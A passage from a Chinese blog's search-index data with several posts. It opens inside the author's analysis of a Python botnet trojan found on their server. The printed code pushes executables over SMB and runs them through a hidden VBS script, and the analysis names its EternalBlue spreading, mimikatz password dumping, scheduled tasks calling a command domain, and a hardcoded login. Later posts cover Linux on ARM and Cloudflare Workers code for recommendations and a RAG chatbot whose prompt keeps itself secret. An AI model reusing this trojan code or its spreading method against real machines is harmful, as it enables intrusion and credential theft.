CreateObject(\"WScript.Shell\")\\n    ws.Run \"%s\",0\\n    Set ws = CreateObject(\"WScript.Shell\")\\n    ws.Run \"..\\\\\\\\temp\\\\\\\\updll.exe\",0                  \\n                    ' % self.__command                elif self.__fr == '3':                    installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\\\setup-install.exe')                    self.__command = self.__command.replace('\"', '\"\"')                    vbs_cmd = '\\n    Set ws = CreateObject(\"WScript.Shell\")\\n    ws.Run \"%s\",0\\n    Set ws = CreateObject(\"WScript.Shell\")\\n    ws.Run \"..\\\\\\\\temp\\\\\\\\setup-install.exe\",0                  \\n                    ' % self.__command                else:                    installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\\\upinstalled.exe')                    self.__command = self.__command.replace('\"', '\"\"')                    vbs_cmd = '\\n    Set ws = CreateObject(\"WScript.Shell\")\\n    ws.Run \"%s\",0\\n    Set ws = CreateObject(\"WScript.Shell\")\\n    ws.Run \"..\\\\\\\\temp\\\\\\\\upinstalled.exe\",0                  \\n                    ' % self.__command                installService.copy_file(StrReader(vbs_cmd.strip()), installService.getShare(), 'temp\\\\tmp.vbs')                self.__command = 'cmd /c call \"c:\\\\windows\\\\temp\\\\tmp.vbs\"'            packet['Command'] = self.__command            print self.__command            s.writeNamedPipe(tid, fid_main, str(packet))            LastDataSent = ''            stdin_pipe = RemoteStdInPipe(rpctransport, '\\\\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())            stdin_pipe.start()            stdout_pipe = RemoteStdOutPipe(rpctransport, '\\\\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']), smb.FILE_READ_DATA)            stdout_pipe.start()            stderr_pipe = RemoteStdErrPipe(rpctransport, '\\\\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']), smb.FILE_READ_DATA)            stderr_pipe.start()            time.sleep(1)            installService.uninstall()            s.deleteFile(installService.getShare(), 'temp\\\\tmp.vbs')            unInstalled = True            return True        except SystemExit:            return False        except:            if unInstalled is False:                time.sleep(1)                installService.uninstall()                s.deleteFile(installService.getShare(), 'temp\\\\tmp.vbs')            return False  行为分析那这个代码都干了些什么呢？首先动态分析一下吧，我用微步云沙箱检查了一下，不过好像有人已经上传过了，这个是报告。好像也没啥特别的，先给445端口开了个防火墙，估计是防止其他人利用永恒之蓝入侵，然后整了几个请求几个“beahh.com”域名的定时任务，另外就是同网段扫描啥的，应该是找其他机器继续尝试用漏洞入侵感染这个木马。   之后再看看代码，干的基本上确实是这些事情，主要就是利用永恒之蓝漏洞然后各种扫描，似乎有创假的系统用户的操作，不过没太看懂，扫描的时候除了用漏洞和弱密码之外好像还用了个“k8h3d:k8d3j9SjfS7”的用户？这是连别家的僵尸网络的节点吧，入侵完还给它删了🤣，还有加定时任务，然后用mimikatz把这台机器的密码存到“c:\\windows\\temp\\mkatz.ini”这个文件里，扫描的时候也使用这里获取的密码，可能是考虑有些集群全都用一样的用户名和密码吧。木马的作者应该会利用那些定时任务发布指令，有可能会把密码拿走或者干别的事情吧。   不过定时任务里写的那个地址已经访问不到了（就连获取IP的接口也请求不通了），我在网上搜了一下看行为应该是这个搞门罗币挖矿的木马，代码里没有体现，有可能是那个域名对应的远控服务器干的。不过这篇文章是2019年的，估计作者已经进去了吧，所以访问不到服务器😂，但是5年过去了，他的木马还在忠实的为他寻找肉鸡并等待他发布指令😭，这就是僵尸网络的魅力吧。感想用Python写的木马也挺有意思啊，这个代码中用到“impacket”库我还是头一次了解，看起来可以封装各种各样的网络包，感觉说不定会有项目能用得上，看这个代码也是学到了啊……  如果我能有属于自己的僵尸网络能不能让我的项目永存呢？不过这些感染了木马的老服务器总有一天会被淘汰掉，新的服务器肯定不会装Windows Server 2008这样超老的系统 （我除外🤣） ，而且现在新的系统漏洞越来越少了，想要出现像当年永恒之蓝那样的漏洞估计不太可能了，在未来估计就不会存在僵尸网络了……所以这还是做不到永存啊……" },{ "title": "Linux ARM生态评测", "category": "", "tags": "Linux, ARM, 树莓派", "url": "/2024/10/13/arm-linux.html", "date": "2024/10/13", "content": "看看现在的Linux ARM能不能替代macOS？起因我的树莓派4B从好久之前就一直吃灰了，之前用它装过Ubuntu，openFyde，Windows 11和piCore，但都因为性能和使用体验不佳放弃使用了。不过随着华为的某系统发布以及高通出的某个笔记本电脑用处理器，我对运行在ARM指令集CPU系统的生态产生了一些兴趣。macOS的生态之前我已经体验过了，是符合预期的不错。Windows on ARM虽然在树莓派上装了试着用了但是没驱动太卡了，其实没有体现它怎么样，要想体验还得整个高通CPU的拿来试，不过我手头没有所以没办法😂，那在树莓派上的Linux系统我也试过不少，有什么测试的必要吗？其实还是有的，因为之前我测都是当服务器测的，虽然也测了openFyde（ChromeOS），但是生态其实挺垃圾的，虽然能用Linux软件但是因为是容器卡的不能用。所以这次我想装树莓派官方的Raspberry Pi OS完整版来测测现在Linux ARM生态能不能和我现在用的macOS比拼。   另外前段时间树莓派出了新的连接方式：Raspberry Pi Connect，可以登录树莓派官网的账号然后用浏览器操作图形界面或者命令行，可以自动判断使用P2P模式还是中继模式，而且可以根据浏览器界面大小自动修改树莓派的分辨率，体验还不错。与我Mac上软件的替代测试原生应用测试既然是和macOS相比，那就看看我现在用的软件是不是能在树莓派上原生运行吧。首先是常用的国产软件，比如WPS Office，钉钉，微信，QQ。因为UOS的缘故，大多数常用的国产软件都有Linux ARM的版本，首先钉钉和QQ在官网上可以直接下载deb包安装，运行也没什么问题，功能完全一致，而且也没有卡到不能用的程度，对于树莓派来说已经很让我满意了。WPS Office和微信稍微有点麻烦，官网并没有提供安装包，但是我找到一个不错的国产Linux应用商店——星火应用商店。里面有不少Debian系各种CPU架构的国产软件，官网上没有的也能在这里下到，让我很满意。不过里面有好多Wine的应用……我不是特别想用，而且不知道它是怎么处理的，会不会一个软件安装一个Wine？所以就先不考虑了。随后我在里面找到了WPS Office和微信，安装试了一下，微信看起来还不错，至少小程序，视频号之类的都能用（反正是基于浏览器的，好适配🤣），WPS Office虽然能用，但是刚安装是英文版的……而且中文切换找了半天找不到😅，后来找了半天才找到……不过安了WPS Office，应该再配个中文输入法才对，我试着安装了搜狗输入法，但是安装好之后不能用，Fcitx不停崩溃重启，不知道是什么问题，换了谷歌输入法之后就正常了。   除了常用的国产软件之外，还有一些我平时开发用的软件，这些软件对Linux ARM的支持也挺不错的，可能国外也是比较支持Linux ARM生态吧（大概是因为Chromebook？）。我平时用的VSCode当然是有的，不过数据库管理和接口调试我在Mac用的是Sequel Ace和RapidAPI，这两个是专为macOS设计的，当然没有Linux版。但是这些是有替代品的，我找了一下，数据库我用的是Navicat Premium Lite，它有原生Linux ARM版，但是是AppImage……感觉不是很舒服。接口调试的话用的是Apipost，估计就是因为用的Electron的所以才愿意整跨平台的版本吧。Mac上有时候我还会远程桌面到Windows主机，这个树莓派也可以，有个叫Remmina的客户端可以用，效果也还不错，如果不是局域网连接还有RustDesk可以用（虽然不知道为什么中文会变方块😂）。另外还有用来测试的网站环境，这个倒是比macOS更简单，毕竟Linux有那么多面板，也不需要敲命令安装，而且还可以运行Docker，我这次用的是1Panel，使用基本上没什么问题，还能安装杀毒软件😁（虽然MongoDB安装会因为缺少指令集报错用不了，但是我用不着🤣）。   除此之外还有虚拟机，这个在之前Ubuntu Server上已经测过了，不过那时候是无头模式，现在可以在图形界面用virt-manager来管理了，之前安装了Windows，这次就安装个FreeBSD吧，安装起来也不复杂，和其他虚拟机管理软件一样，而且还能用虚拟串口连接，感觉还挺有意思的。安装好之后上网之类的都没问题，和在macOS上用UTM的区别可能就只有在macOS上可以把Rosetta 2穿透到Linux下使用吧。   另外还有游戏，专门为Linux ARM设计的游戏估计没几个，不过想玩肯定是有的，比如用Ren’Py引擎的游戏以及在浏览器上的游戏，其他引擎似乎没什么资料……但没事，在macOS上也是用的iOS版的模拟器，后面讲到的安卓也可以运行模拟器😁。我之前也研究过在macOS上玩Ren’Py引擎的游戏。不过Ren’Py默认发行是不支持Linux ARM版的……但是可以另外下载SDK来支持。然而有一个问题，只有新版的SDK才支持64位的ARM，旧版虽然有树莓派支持，但可能是因为旧版树莓派只有32位的系统所以没有64位ARM的运行库😂。我看了看我电脑上之前下的Ren’Py引擎的游戏，找了一个《Sakura Isekai Adventure》游戏看了一下Ren’Py的版本还可以，SDK也能正常的在树莓派上运行，试了一下感觉效果还不错，运行的方法是“SDK所在目录/renpy.sh 游戏所在目录/Game”，之前没加Game不停报错😅，文档写的也不清晰，测了半天才测出来……那对于旧版的就不能玩了吗？估计是可以但可能要自己编译很麻烦，反正源代码都有。不过有个例外，我本来想试试《Katawa Shoujo》，它用的Ren’Py很旧，但是因为是同人类游戏所以有人做了重制版《Katawa Shoujo: Re-Engineered》😆，这个是用的最新版的Ren’Py，增加了新的特性和各种BUG，但是正因如此，可以简单的在树莓派上运行了🤣。   至于其他关于AI方面的比如LLaMA和Stable Diffusion，这些毕竟是开源的，Linux ARM当然可以运行，只不过树莓派的GPU不能用来加速，运行会很卡而已，生态方面是没问题。安卓软件测试既然macOS可以原生运行iOS软件，那对于Linux来说自然应该对比一下原生运行安卓软件了。关于安卓软件我之前在Ubuntu Server上已经测了Waydroid和redroid。但毕竟当时是在无头模式下测的，没有图形界面，现在有了图形界面可以再测一下。安装除了要挂梯子下载镜像之外没什么问题，但是打开的时候不知道为什么只会黑屏……后来搜了一下，执行“waydroid prop set persist.waydroid.multi_windows true”再重启就没问题了。虽然安卓软件比iOS的要更多，不过毕竟树莓派的性能想玩手游还是有点勉强，当然这次测的是生态，所以还是完全没问题😁。转译应用测试既然macOS有Rosetta 2可以运行x86架构的软件，那Linux ARM当然也不能少，这个方案比较多，有QEMU，Box86/64还有ExaGear，不过听说ExaGear性能相对更好一些，那这次就测这个吧。   现在ExaGear已经被华为收购了，想要下载的话在华为源里就能下到，我装的是4.0.0的，因为4.1.0似乎要自己配置镜像太麻烦了所以就没用。安装很简单，直接把对应目录的deb包安装了就可以，安装好之后就可以执行“exagear”进到转译后的Bash中，不过和macOS有个区别，macOS的程序都是通用二进制文件，里面包含了ARM架构和x86架构的程序，所以可以无缝衔接，Linux当然没有这个特性，所以ExaGear是映射到它自己的镜像里面的，各种包还得另外安装。   那这个东西装什么比较好呢？我发现我的Mac上有个网易云音乐，在Linux上似乎没有ARM版的，在星火应用商店也只有Wine版。但是它之前和深度合作出过Linux版，现在估计谈崩了从官网上消失了，但是原来的链接还在可以下载。具体的流程在CSDN上有篇博客有写，试了一下可以安装，而且运行效率比我预期高不少，最起码点击不算卡，而且听音乐也没有卡顿的感觉，感觉算是相当不错了。   其实我也挺疑惑Rosetta 2和ExaGear的效率怎么样，我看网上有篇文章Comparing Huawei ExaGear to Apple’s Rosetta 2 and Microsoft’s solution说ExaGear效率最高，Rosetta 2有硬件加速都比不上，说实话我是不信的，要是那么厉害Eltechs怎么可能停更？而且全网就这一篇文章，很难不相信是华为员工写的软文😅，我自己手头没有合适的设备也不好测，不知道有没有大佬来打假。   那运行转译的Linux软件没问题之后再测一下转译Windows应用吧，我的Mac上可是有Whisky的。那对树莓派来说就是ExaGear+Wine了。安装很简单，直接在ExaGear的shell里用apt安装就行，安装好之后就可以用“exagear – wine ./windows程序.exe”来运行了。我在我的Mac上找了一个用Godot引擎写的小游戏，放上去试了一下，居然可以运行，而且也是比想象中的流畅，不过我玩的本来就是画面变动少的游戏也不会卡到哪里，不过能在接受范围内有反应已经很不错了，虽然没Mac反应快但毕竟测生态和芯片本身速度无关，树莓派的性能当然比不了Mac，能玩我已经很满足了。   其实如果论游戏的话在x86平台毕竟有SteamOS的先例，用ExaGear转译然后加上Proton如果芯片性能足够的情况应该是能玩不少游戏的。其他实验在玩树莓派的时候我又想玩电台了🤣毕竟这是树莓派唯一的优势，能用到它的GPIO接口，不然真的就是性价比不怎么样，性能还差的ARM迷你主机了。这次我多试了一下怎么样把图形界面上的声音通过广播传出来，如果可以的话树莓派离得比较远而且不用蓝牙耳机的情况下也能听到声音了。不过我不太清楚Linux中的声音是怎么合成的，我搜了一下似乎是用PulseAudio合成的，用“pactl list sources”命令就可以列出相关的设备，在我的树莓派上可以看到是叫“alsa_output.platform-bcm2835_audio.stereo-fallback.monitor”，然后用sox -t pulseaudio alsa_output.platform-bcm2835_audio.stereo-fallback.monitor -t wav - | sudo ./pi_fm_adv --audio - --freq 87.0 --power 7 --gpio 4 --gpio 20 --gpio 32 --rds 0命令理论上就可以发射电台了，但实际上不知道为什么虽然能听到声音，但是声调变的很高，而且一卡一卡的，根本不能听，而且进程会卡住，要用kill -9才能结束😓……   不过这个就和Linux ARM生态无关了，这是只有树莓派才有的特殊功能，其他电脑估计做不到这一点😆。感想这次测下来感觉Linux ARM好像还挺强的啊，基本上我Mac上装的东西都有，而且功能也挺齐全，从原生应用的角度来看可能比Windows on ARM还多。看来除了易用性之外Linux ARM生态已经很成熟了啊，这么来看Mac就只剩下美观、易用性和芯片性能强大这些优势了啊😂。" },{ "title": "如何给博客添加相似文章推荐功能", "category": "", "tags": "Cloudflare, Workers, Vectorize, 博客", "url": "/2024/10/01/suggest.html", "date": "2024/10/01", "content": "看来向量数据库的作用有很多啊……起因前几天我用Cloudflare Vectorize给博客的聊天机器人加了知识库的功能，本来想着用向量数据库做文章推荐是不是每次都要走翻译+向量化的操作，不过后来我又仔细看了一下Cloudflare的官方文档，发现它是可以根据ID查询存储的向量的，既然这样的话用现有的数据库做一个相似文章推荐应该非常简单，于是我就做了一个试试看。制作过程后端部分其实流程很简单，就是把对应ID的向量查出来之后拿着这个向量再去查询就好了，唯一需要注意的就是它查出来的第一条肯定是自己，所以只要把第一条删掉就行， 代码也非常简单 （后来又加了缓存稍微变的复杂了😂）：if (url.pathname.startsWith(\"/suggest\")) {  let resp = [];  let update_time = url.searchParams.get('update');  if (update_time) {    let result = await env.mayx_index.getByIds([      query    ]);    if (result.length) {      let cache = await db.prepare(\"SELECT `id`, `suggest`, `suggest_update` FROM `blog_summary` WHERE `id` = ?1\")        .bind(query).first();      if (!cache.id) {        return Response.json(resp, {          headers: commonHeader        });      }      if (update_time != cache.suggest_update) {        resp = await env.mayx_index.query(result[0].values, { topK: 6 });        resp = resp.matches;        resp.splice(0, 1);        await db.prepare(\"UPDATE `blog_summary` SET `suggest_update` = ?1, `suggest` = ?2 WHERE `id` = ?3\")          .bind(update_time, JSON.stringify(resp), query).run();      } else {        resp = JSON.parse(cache.suggest);      }    }    resp = resp.map(respObj => {      respObj.id = encodeURI(respObj.id);      return respObj;    });  }  return Response.json(resp, {    headers: commonHeader  });}前端部分后端当然很简单，但是我之前有些欠考虑了，我当时做AI摘要和知识库的时候，都只存了文章的链接，没有存标题😅……但是推荐文章的超链接总不能不放标题吧……那怎么办呢？一种就是我把数据库清空然后摘要中加一个字段，向量数据库中加一个元数据，这样查询的时候就能查到标题然后显示出来了。不过这种方法我仔细考虑了一下，麻烦是一方面，另一方面是我的接口没做验证，有人乱上传文章会影响推荐链接显示的内容，不太合适……那应该用什么办法呢？   我还想到一个办法，我之前给博客做过全文搜索的功能，用这个JS关联查询就能查到标题，而且查不到的内容也显示不出来，这样就能避免有人故意乱上传导致显示奇怪的内容了，不过之前的设计是每次查询都要加载一次包含我文章内容的JSON文件，感觉不太合理，虽然那个文件不算特别大，但是也挺影响速度的，所以我想了一下还是用localStorage缓存一下比较好，所以增加了一个能缓存获取搜索JSON的函数：function getSearchJSON(callback) {  var searchData = JSON.parse(localStorage.getItem(\"blog_\" + lastUpdated.valueOf()));  if (!searchData) {    localStorage.clear();    $.getJSON(\"/search.json\", function (data) {        localStorage.setItem(\"blog_\" + lastUpdated.valueOf(), JSON.stringify(data));        callback(data);    });  } else {    callback(searchData);  }}做好这个之后就可以做文章推荐的功能了，不过文章推荐应不应该加载完页面就加载呢？其实我测了一下Vectorize数据库的查询速度，不算很慢，但还是需要时间，另外免费版我看了下额度是每月3000万个查询的向量维度，这个其实我没看太懂😂。另外Cloudflare不知道为什么没有展示免费版剩余的额度，而且它是按月计算的，导致我不敢乱用这个查询。 所以我想了一下还是给个按钮来调用吧 （后来想了一下干脆直接调用然后加个缓存吧，毕竟我的文章不变，推荐内容也不会变）。最终调用的函数如下：function getSuggestBlog(blogurl) {    var suggest = $(\"#suggest-container\")[0];    suggest.innerHTML = \"Loading...\";    $.get(BlogAPI + \"/suggest?id=\" + blogurl + \"&update=\" + lastUpdated.valueOf(), function (data) {        if (data.length) {            getSearchJSON(function (search) {                suggest.innerHTML = '<b>推荐文章</b><hr style=\"margin: 0 0 5px\"/>';                const searchMap = new Map(search.map(item => [item.url, item]));                const merged = data.map(suggestObj => {                    const searchObj = searchMap.get(suggestObj.id);                    return searchObj ? { ...searchObj } : null;                });                merged.forEach(element => {                    if (element) {                        suggest.innerHTML += \"<a href=\" + element.url + \">\" + element.title + \"</a> - \" + element.date + \"<br />\";                    }                });            });        } else {            suggest.innerHTML = \"暂无推荐文章……\";        }    });}感想看来向量数据库的用途还是挺广泛的，不仅仅是为了给AI使用，说不定还能做更多有意思的功能，这下不得不更依赖Cloudflare了😆。   另外随着做了越来越多的功能，做新的功能还能用上旧的功能，感觉这样我的博客可以有不少发展的空间啊😁。" },{ "title": "用CF Vectorize把博客作为聊天AI的知识库", "category": "", "tags": "Cloudflare, Workers, AI, RAG, Vectorize", "url": "/2024/09/27/rag.html", "date": "2024/09/27", "content": "有了Cloudflare之后，什么都免费了！起因前段时间我用Cloudflare Workers给博客加了AI摘要，那时候其实就想做个带RAG功能的聊天机器人，不过这个操作需要嵌入模型和向量数据库。那时候Cloudflare倒是有这些东西，但是向量数据库Vectorize还没有免费，不过我仔细看了文档，他们保证过段时间一定会免费的。直到前两天我打开Cloudflare之后发现真的免费了！有了向量数据库之后我就可以让博客的机器人（在电脑端可以在左下角和伊斯特瓦尔对话）获取到我博客的内容了。学习RAGRAG的原理还是挺简单的，简单来说就是在不用让LLM读取完整的数据库，但是能通过某种手段让它获取到和问题相关性最高的内容然后进行参考生成，至于这个“某种手段”一般有两种方式，一种是比较传统的分词+词频统计查询，这种其实我不会🤣，没看到Cloudflare能用的比较好的实现方式，另外这种方式的缺陷是必须包含关键词，如果没有关键词就查不出来，所以这次就不采用这种方法了。另一种就是使用嵌入模型+向量数据库了，这个具体实现我不太清楚，不过原理似乎是把各种词放在一个多维空间中，然后意思相近的词在训练嵌入模型的时候它们的距离就会比较近，当使用这个嵌入模型处理文章的时候它就会综合训练数据把内容放在一个合适的位置，这样传入的问题就可以用余弦相似度之类的算法来查询问题和哪个文章的向量最相近。至于这个查询就需要向量数据库来处理了。   原理还是挺简单的，实现因为有相应的模型，也不需要考虑它们的具体实现，所以也很简单，所以接下来就来试试看吧！用Cloudflare Workers实现在动手之前，先看看Cloudflare官方给的教程吧，其实看起来还是挺简单的（毕竟官方推荐难度是初学者水平😆）。不过有个很严重的问题，官方创建向量数据库要用它那个命令行操作，我又不是JS开发者，一点也不想用它那个程序，但是它在dashboard上也没有创建的按钮啊……那怎么办呢？还好文档中说了可以用HTTP API进行操作。另外还有一个问题，它的API要创建一个令牌才能用，我也不想创建令牌，怎么办呢？还好可以直接用dashboard中抓的包当作令牌来用，这样第一步创建就完成了。   接下来要和Worker进行绑定，还好这一步可以直接在面板操作，没有什么莫名其妙的配置文件来恶心我😂，配置好之后就可以开始写代码了。   首先确定一下流程，当我写完文章之后会用AI摘要获取文章内容，这时候就可以进行用嵌入模型向量化然后存数据库了。我本来想用文章内容进行向量化的，但是我发现Cloudflare给的只有智源的英文嵌入模型😅（不知道以后会不会加中文的嵌入模型……），而且不是Beta版会消耗免费额度，但也没的选了。既然根据上文来看嵌入模型是涉及词义的，中文肯定不能拿给英文的嵌入模型用，那怎么办呢？还好Cloudflare的模型多，有个Meta的翻译模型可以用，我可以把中文先翻译成英文然后再进行向量化，这样不就能比较准确了嘛。但是这样速度会慢不少，所以我想了一下干脆用摘要内容翻译再向量化吧，反正摘要也基本包含我文章的内容了，给AI也够用了，这样速度应该能快不少。当然这样的话问题也得先翻译向量化再查询了。   那么接下来就写代码吧（直接拿上次AI摘要的代码改的）：async function sha(str) {  const encoder = new TextEncoder();  const data = encoder.encode(str);  const hashBuffer = await crypto.subtle.digest(\"SHA-256\", data);  const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array  const hashHex = hashArray    .map((b) => b.toString(16).padStart(2, \"0\"))    .join(\"\"); // convert bytes to hex string  return hashHex;}async function md5(str) {  const encoder = new TextEncoder();  const data = encoder.encode(str);  const hashBuffer = await crypto.subtle.digest(\"MD5\", data);  const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array  const hashHex = hashArray    .map((b) => b.toString(16).padStart(2, \"0\"))    .join(\"\"); // convert bytes to hex string  return hashHex;}export default {  async fetch(request, env, ctx) {    const db = env.blog_summary;    const url = new URL(request.url);    const query = decodeURIComponent(url.searchParams.get('id'));    const commonHeader = {      'Access-Control-Allow-Origin': '*',      'Access-Control-Allow-Methods': \"*\",      'Access-Control-Allow-Headers': \"*\",      'Access-Control-Max-Age': '86400',    }    if (url.pathname.startsWith(\"/ai_chat\")) {      // 获取请求中的文本数据      if (!(request.headers.get('content-type') || '').includes('application/x-www-form-urlencoded')) {        return Response.redirect(\"https://mabbs.github.io\", 302);      }      const req = await request.formData();      let questsion = req.get(\"info\")      const response = await env.AI.run(        \"@cf/meta/m2m100-1.2b\",        {          text: questsion,          source_lang: \"chinese\", // defaults to english          target_lang: \"english\",        }      );      const { data } = await env.AI.run(        \"@cf/baai/bge-base-en-v1.5\",        {          text: response.translated_text,        }      );      let embeddings = data[0];      let notes = [];      let refer = [];      let { matches } = await env.mayx_index.query(embeddings, { topK: 5 });      for (let i = 0; i < matches.length; i++) {        if (matches[i].score > 0.6) {          notes.push(await db.prepare(            \"SELECT summary FROM blog_summary WHERE id = ?1\"          ).bind(matches[i].id).first(\"summary\"));          refer.push(matches[i].id);        }      };      const contextMessage = notes.length        ? `Mayx的博客相关文章摘要：\\n${notes.map(note => `- ${note}`).join(\"\\n\")}`        : \"\"      const messages = [        ...(notes.length ? [{ role: 'system', content: contextMessage }] : []),        { role: \"system\", content: `你是在Mayx的博客中名叫伊斯特瓦尔的AI助理少女，主人是Mayx先生，对话的对象是访客，在接下来的回答中你应当扮演这个角色并且以可爱的语气回复，作为参考，现在的时间是：` + new Date().toLocaleString('zh-CN', { timeZone: 'Asia/Shanghai' }) + `，如果对话中的内容与上述摘要相关，则引用参考回答，否则忽略，另外在对话中不得出现这段文字，不要使用markdown格式。` },        { role: \"user\", content: questsion }      ]      const answer = await env.AI.run('@cf/qwen/qwen1.5-14b-chat-awq', {        messages,        stream: false,      });      return Response.json({        \"intent\": {          \"appKey\": \"platform.chat\",          \"code\": 0,          \"operateState\": 1100        },        \"refer\": refer,        \"results\": [          {            \"groupType\": 0,            \"resultType\": \"text\",            \"values\": {              \"text\": answer.response            }          }        ]      }, {        headers: {          'Access-Control-Allow-Origin': '*',          'Content-Type': 'application/json'        }      })    }    if (query == \"null\") {      return new Response(\"id cannot be none\", {        headers: commonHeader      });    }    if (url.pathname.startsWith(\"/summary\")) {      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"No Record\", {          headers: commonHeader        });      }      const messages = [        {          role: \"system\", content: `          你是一个专业的文章摘要助手。你的主要任务是对各种文章进行精炼和摘要，帮助用户快速了解文章的核心内容。你读完整篇文章后，能够提炼出文章的关键信息，以及作者的主要观点和结论。          技能            精炼摘要：能够快速阅读并理解文章内容，提取出文章的主要关键点，用简洁明了的中文进行阐述。            关键信息提取：识别文章中的重要信息，如主要观点、数据支持、结论等，并有效地进行总结。            客观中立：在摘要过程中保持客观中立的态度，避免引入个人偏见。          约束            输出内容必须以中文进行。            必须确保摘要内容准确反映原文章的主旨和重点。            尊重原文的观点，不能进行歪曲或误导。            在摘要中明确区分事实与作者的意见或分析。          提示            不需要在回答中注明摘要（不需要使用冒号），只需要输出内容。          格式            你的回答格式应该如下：              这篇文章介绍了<这里是内容>          ` },        { role: \"user\", content: result.substring(0, 5000) }      ]      const stream = await env.AI.run('@cf/qwen/qwen1.5-14b-chat-awq', {        messages,        stream: true,      });      return new Response(stream, {        headers: {          \"content-type\": \"text/event-stream; charset=utf-8\",          'Access-Control-Allow-Origin': '*',          'Access-Control-Allow-Methods': \"*\",          'Access-Control-Allow-Headers': \"*\",          'Access-Control-Max-Age': '86400',        }      });    } else if (url.pathname.startsWith(\"/get_summary\")) {      const orig_sha = decodeURIComponent(url.searchParams.get('sign'));      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"no\", {          headers: commonHeader        });      }      let result_sha = await sha(result);      if (result_sha != orig_sha) {        return new Response(\"no\", {          headers: commonHeader        });      } else {        let resp = await db.prepare(          \"SELECT summary FROM blog_summary WHERE id = ?1\"        ).bind(query).first(\"summary\");        if (!resp) {          const messages = [            {              role: \"system\", content: `          你是一个专业的文章摘要助手。你的主要任务是对各种文章进行精炼和摘要，帮助用户快速了解文章的核心内容。你读完整篇文章后，能够提炼出文章的关键信息，以及作者的主要观点和结论。          技能            精炼摘要：能够快速阅读并理解文章内容，提取出文章的主要关键点，用简洁明了的中文进行阐述。            关键信息提取：识别文章中的重要信息，如主要观点、数据支持、结论等，并有效地进行总结。            客观中立：在摘要过程中保持客观中立的态度，避免引入个人偏见。          约束            输出内容必须以中文进行。            必须确保摘要内容准确反映原文章的主旨和重点。            尊重原文的观点，不能进行歪曲或误导。            在摘要中明确区分事实与作者的意见或分析。          提示            不需要在回答中注明摘要（不需要使用冒号），只需要输出内容。          格式            你的回答格式应该如下：              这篇文章介绍了<这里是内容>          ` },            { role: \"user\", content: result.substring(0, 5000) }          ]          const answer = await env.AI.run('@cf/qwen/qwen1.5-14b-chat-awq', {            messages,            stream: false,          });          resp = answer.response          await db.prepare(\"UPDATE blog_summary SET summary = ?1 WHERE id = ?2\")            .bind(resp, query).run();        }        let is_vec = await db.prepare(          \"SELECT `is_vec` FROM blog_summary WHERE id = ?1\"        ).bind(query).first(\"is_vec\");        if (is_vec == 0) {          const response = await env.AI.run(            \"@cf/meta/m2m100-1.2b\",            {              text: resp,              source_lang: \"chinese\", // defaults to english              target_lang: \"english\",            }          );          const { data } = await env.AI.run(            \"@cf/baai/bge-base-en-v1.5\",            {              text: response.translated_text,            }          );          let embeddings = data[0];          await env.mayx_index.upsert([{            id: query,            values: embeddings          }]);          await db.prepare(\"UPDATE blog_summary SET is_vec = 1 WHERE id = ?1\")            .bind(query).run();        }        return new Response(resp, {          headers: commonHeader        });      }    } else if (url.pathname.startsWith(\"/is_uploaded\")) {      const orig_sha = decodeURIComponent(url.searchParams.get('sign'));      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"no\", {          headers: commonHeader        });      }      let result_sha = await sha(result);      if (result_sha != orig_sha) {        return new Response(\"no\", {          headers: commonHeader        });      } else {        return new Response(\"yes\", {          headers: commonHeader        });      }    } else if (url.pathname.startsWith(\"/upload_blog\")) {      if (request.method == \"POST\") {        const data = await request.text();        let result = await db.prepare(          \"SELECT content FROM blog_summary WHERE id = ?1\"        ).bind(query).first(\"content\");        if (!result) {          await db.prepare(\"INSERT INTO blog_summary(id, content) VALUES (?1, ?2)\")            .bind(query, data).run();          result = await db.prepare(            \"SELECT content FROM blog_summary WHERE id = ?1\"          ).bind(query).first(\"content\");        }        if (result != data) {          await db.prepare(\"UPDATE blog_summary SET content = ?1, summary = NULL, is_vec = 0 WHERE id = ?2\")            .bind(data, query).run();        }        return new Response(\"OK\", {          headers: commonHeader        });      } else {        return new Response(\"need post\", {          headers: commonHeader        });      }    } else if (url.pathname.startsWith(\"/count_click\")) {      let id_md5 = await md5(query);      let count = await db.prepare(\"SELECT `counter` FROM `counter` WHERE `url` = ?1\")        .bind(id_md5).first(\"counter\");      if (url.pathname.startsWith(\"/count_click_add\")) {        if (!count) {          await db.prepare(\"INSERT INTO `counter` (`url`, `counter`) VALUES (?1, 1)\")            .bind(id_md5).run();          count = 1;        } else {          count += 1;          await db.prepare(\"UPDATE `counter` SET `counter` = ?1 WHERE `url` = ?2\")            .bind(count, id_md5).run();        }      }      if (!count) {        count = 0;      }      return new Response(count, {        headers: commonHeader      });    } else {      return Response.redirect(\"https://mabbs.github.io\", 302)    }  }}使用方法为了避免重复生成向量（主要是不知道它这个数据库怎么根据id进行查询），所以在D1数据库里新加了一个数字类型的字段“is_vec”，另外就是创建向量数据库，创建方法看官方文档吧，如果不想用那个命令行工具可以看API文档。因为那个嵌入模型生成的维度是768，所以创建这个数据库的时候维度也是768。度量算法反正推荐的是cosine，其他的没试过不知道效果怎么样。最终如果想用我的代码，需要在Worker的设置页面中把绑定的向量数据库变量设置成“mayx_index”，如果想用其他的可以自己修改代码。其他想法其实我也想加 推荐文章 （在2024.10.01已经做出来了）和智能搜索的，但就是因为没有中文嵌入模型要翻译太费时间😅，所以就算啦，至于其他的功能回头看看还有什么AI可以干的有趣功能吧。感想Cloudflare实在是太强了，什么都能免费，这个RAG功能其他家都是拿出去卖的，他们居然免费！唯一可惜的就是仅此一家，免费中的垄断地位了，希望Cloudflare能不忘初心，不要倒闭或者变质了🤣。" },{ "title": "Python国密算法使用探索", "category": "", "tags": "Python, GmSSL, 国密", "url": "/2024/09/02/gmssl.html", "date": "2024/09/02", "content": 